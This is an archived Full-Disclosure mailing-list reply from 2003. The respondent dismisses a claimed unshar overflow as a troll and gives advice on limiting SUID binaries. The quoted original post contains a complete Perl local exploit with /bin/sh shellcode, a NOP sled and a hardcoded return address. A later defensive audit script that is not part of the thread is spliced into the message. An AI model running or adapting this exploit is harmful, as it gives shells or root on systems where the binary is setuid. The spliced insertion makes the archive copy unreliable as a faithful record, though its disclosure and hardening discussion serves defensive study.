Full Disclosure mailing list archives

Re: flames security group start to play, yet another vuln found (rustymemory and welshboi)


From: Todd Burroughs <todd () hostopia com>
Date: Thu, 4 Dec 2003 02:34:07 -0500 (EST)

This has to be a troll, I mean if I made /bin/sh SUID root and gave you
a shell, you could probably get root on my system.

You shouldn't have much on your system that is SUID root.  I have no
idea why someone would even think that unshar would be set this way.
If you use SuSE, set security to "paranoid" and it does a decent job;
after that you will need to add whatever you need to the security.local
file, depending on what you use the system for.

I know I'm biting on this, but it does underscore the fact that you should
"unsuid" anything that is not really needed on your system.

I make a small partition and mount everything else "nosuid".  I put
anything that needs suid or sgid on that filesystem and make symlinks
to where it should be.  This makes it easy to find SUID programs:
run mount and make sure things are mounted nosuid, then look at your
"suid partition".

Todd Burroughs

---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.
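The two checks Todd describes (confirm what is mounted without nosuid, then inventory the setuid/setgid files that remain) as an added POSIX sh example; this is not code from the thread or from any distribution's security tooling. It assumes mount(8)-style output of the form "dev on mountpoint type fstype (options)", and the sample mount listing embedded below is constructed for illustration.

```shell
#!/bin/sh
# Added example, not part of the original post: audit helpers for the
# "keep SUID/SGID on one partition, mount the rest nosuid" layout.

# Constructed sample of mount(8) output, used when no real listing is
# supplied (for example on a box where you only have a saved copy).
SAMPLE_MOUNTS='/dev/sda1 on / type ext4 (rw,relatime)
/dev/sda2 on /home type ext4 (rw,nosuid,nodev,relatime)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,noexec)
/dev/sda3 on /suid type ext4 (rw,relatime)'

# Read mount lines on stdin and print "mountpoint fstype" for every
# filesystem whose option list lacks "nosuid".  Those are the only
# places a setuid bit is honoured by the kernel, so they are the
# filesystems worth inspecting.
mounts_without_nosuid() {
    while read -r dev _on mnt _type fstype opts; do
        [ -n "$dev" ] || continue            # skip blank lines
        case "$opts" in
            *nosuid*) ;;                     # setuid bits ignored here
            *) printf '%s %s\n' "$mnt" "$fstype" ;;
        esac
    done
}

# List setuid/setgid regular files under a directory, staying on the
# same filesystem (-xdev) so a walk of "/" does not wander into /proc.
# -perm -4000 / -perm -2000 are POSIX, unlike GNU find's -perm /6000.
setid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Number of setuid/setgid files under a directory, as a bare integer.
count_setid_files() {
    n=$(setid_files "$1" | wc -l)
    echo $((n))
}

# Full report against the live system: each filesystem that honours
# setuid, followed by the setid files it actually contains.
report() {
    mount | mounts_without_nosuid | while read -r mnt fstype; do
        printf '== %s (%s) honours setuid ==\n' "$mnt" "$fstype"
        setid_files "$mnt" | while read -r f; do
            ls -l "$f"
        done
    done
}

# Only touch the live system when explicitly asked, so sourcing this
# file or running the sample stays side-effect free.
case "${1:-}" in
    --report) report ;;
    --sample) printf '%s\n' "$SAMPLE_MOUNTS" | mounts_without_nosuid ;;
esac
```

Run with --sample to see the filter applied to the constructed listing (it prints "/ ext4" and "/suid ext4"), or with --report on a real host; a healthy layout in Todd's scheme shows exactly one filesystem honouring setuid, and every path under it is something you recognise.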

On Wed, 3 Dec 2003, KF wrote:

if you are bored .... download unrar.
-KF


rustymemory wrote:

By: flames.bluefox.net.nz
if unshar suid; then you w00t

proof of concept?

rustymemory@flames:~$ unshar -f `perl -e 'print"A"x2000'`
............................AAAAAAAAAAAAAASegmentation fault

welshboi@flames:~$ more unshar.pl
#!/usr/bin/perl
#/usr/bin/unshar local sploit.
#coded by welshboi (deadbeat)
#found by rustymemory
#
#FLAMES SECURITY GROUP
#Private, please dont distribute
#affects all linux distributions , tested on slackware 9.1 and MDK
###############################################
#[deadbeat@pikachu sploits]$ perl unshar.pl #
# #
#[] /usr/bin/unshar exploit #
#[] coded by: deadbeat [] #
#[] found by: rustymemory [] #
#_f1GWugHu[SPZ #
# #
#sh-2.05b$ #
###############################################
# 47byte shellcode (exec /bin/sh)
$hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";
$egg = 2000;
$buf = 1128;
$nop = "\x90";
$offset = 0;
$ret =0x40055bdc;
if(@ARGV == 1) {$offset = $ARGV[0];}
$addr = pack('l', ($ret + $offset));
for($i = 0; $i<$buf; $i += 4){$evil .=$addr;}
for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;}
$evil .= $hell;
print "\n[] /usr/bin/unshar exploit []\n";
print "[] coded by: deadbeat, uk2sec []\n";
print "[] found by: rustymemory []\n\n";
print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n");
system("/usr/bin/unshar -f $evil");

---------------------------------------------------------
shouts to ?

calidan (daddeh), linucks (wifi whore), h0stile (the maniac), and the rest
of flames security group, and rusty's fiancee

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html